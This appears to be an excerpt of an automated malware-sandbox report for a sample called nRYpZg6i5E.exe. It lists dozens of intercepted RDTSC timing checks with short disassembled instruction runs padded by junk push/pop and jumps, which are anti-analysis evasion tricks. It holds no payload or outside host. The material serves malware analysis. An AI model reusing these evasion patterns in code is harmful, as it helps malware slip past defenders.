Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B69995 second address: B6999B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B6999B second address: B699C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007FD5E9559C76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD5E9559C88h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B69EAF second address: B69EB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B69EB9 second address: B69ED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FD5E9559C81h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B6A1A2 second address: B6A1AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007FD5E912D9F2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B6A1AF second address: B6A1B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B6A2DA second address: B6A2E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B6A2E2 second address: B6A2E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B6A2E7 second address: B6A2F1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD5E912D9ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B6A2F1 second address: B6A2F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B6A2F8 second address: B6A300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B74418 second address: B7441D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B72747 second address: B7275A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007FD5E912D9EAh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B72AED second address: B72AFB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnc 00007FD5E9559C76h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B730BA second address: B730BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B7AD07 second address: B7AD0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B7AD0F second address: B7AD3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007FD5E912DA09h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B7A6F7 second address: B7A705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jc 00007FD5E9559C76h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B7A705 second address: B7A709 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B7A86E second address: B7A872 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B7A872 second address: B7A89D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E912D9F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007FD5E912D9E8h 0x0000000f push edx 0x00000010 pop edx 0x00000011 pushad 0x00000012 jmp 00007FD5E912D9ECh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B7A89D second address: B7A8A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B8C856 second address: B8C867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007FD5E912D9E6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B93DF5 second address: B93E14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E9559C89h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B9A665 second address: B9A66B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B9D283 second address: B9D28C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B9D28C second address: B9D291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B9D291 second address: B9D2A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FD5E9559C76h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007FD5E9559C76h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B9D0F0 second address: B9D0FC instructions: 0x00000000 rdtsc 0x00000002 je 00007FD5E912D9EEh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B9F63E second address: B9F652 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007FD5E9559C76h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B9F652 second address: B9F666 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FD5E912D9E6h 0x0000000e jc 00007FD5E912D9E6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B9F666 second address: B9F683 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E9559C89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BA4DC8 second address: BA4DD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BA4DD1 second address: BA4DDB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD5E9559C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BA4C6C second address: BA4C76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FD5E912D9E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BAA82E second address: BAA84F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD5E9559C89h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BAA84F second address: BAA867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD5E912D9F2h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BAA867 second address: BAA883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007FD5E9559C82h 0x0000000b ja 00007FD5E9559C76h 0x00000011 jc 00007FD5E9559C76h 0x00000017 popad 0x00000018 pushad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BA90C3 second address: BA90CD instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD5E912D9F7h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BA962C second address: BA9630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BA9630 second address: BA9642 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c jne 00007FD5E912D9E6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BA9642 second address: BA9646 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BA98F9 second address: BA9906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BA9906 second address: BA990C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BA990C second address: BA9910 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BA9A72 second address: BA9A84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007FD5E9559C76h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BA9A84 second address: BA9A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BA9A88 second address: BA9A8E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BA9A8E second address: BA9A94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BA9A94 second address: BA9A99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BAA54E second address: BAA552 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BAA552 second address: BAA558 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BAA558 second address: BAA568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jo 00007FD5E912D9E6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BAA568 second address: BAA574 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD5E9559C76h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BAE353 second address: BAE359 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BAE359 second address: BAE367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FD5E9559C7Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BAE367 second address: BAE371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BAE371 second address: BAE377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BAE377 second address: BAE37B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BADFE5 second address: BADFE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BADFE9 second address: BAE00D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FD5E912D9E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD5E912D9F3h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BAE00D second address: BAE041 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD5E9559C76h 0x00000008 jmp 00007FD5E9559C89h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FD5E9559C81h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BAE041 second address: BAE049 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BAE049 second address: BAE069 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E9559C87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BEAD27 second address: BEAD4C instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD5E912DA00h 0x00000008 jmp 00007FD5E912D9F8h 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BEAD4C second address: BEAD59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BEAD59 second address: BEAD80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 js 00007FD5E912D9E6h 0x0000000e push eax 0x0000000f pop eax 0x00000010 jnp 00007FD5E912D9E6h 0x00000016 popad 0x00000017 pushad 0x00000018 jmp 00007FD5E912D9EDh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BF161E second address: BF163E instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD5E9559C76h 0x00000008 jmp 00007FD5E9559C83h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BF163E second address: BF1645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BF1645 second address: BF164A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BF164A second address: BF1650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BF14BD second address: BF14C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop esi 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BF14C9 second address: BF14CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BF14CE second address: BF14D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BED027 second address: BED036 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BED036 second address: BED03A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BED03A second address: BED03E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BFDB18 second address: BFDB1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BFDB1C second address: BFDB24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BFD600 second address: BFD619 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FD5E9559C7Fh 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BFD619 second address: BFD61F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BFD61F second address: BFD639 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD5E9559C76h 0x00000008 jns 00007FD5E9559C76h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jg 00007FD5E9559C7Eh 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BFD773 second address: BFD77F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FD5E912D9E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BFD77F second address: BFD78E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FD5E9559C76h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BFD78E second address: BFD792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BFD792 second address: BFD796 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BFD796 second address: BFD7A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007FD5E912D9E6h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: CC30FE second address: CC3104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: CC3104 second address: CC3130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD5E912D9E6h 0x0000000a popad 0x0000000b pop ecx 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 jne 00007FD5E912D9E6h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FD5E912D9F1h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: CC3130 second address: CC3134 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: CC33B2 second address: CC33E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E912D9EFh 0x00000007 jns 00007FD5E912D9E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD5E912D9F8h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: CC33E7 second address: CC33F7 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD5E9559C76h 0x00000008 jnc 00007FD5E9559C76h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: CC33F7 second address: CC33FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: CC33FD second address: CC3403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: CC3403 second address: CC3407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: CC3407 second address: CC340B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: CC340B second address: CC3411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
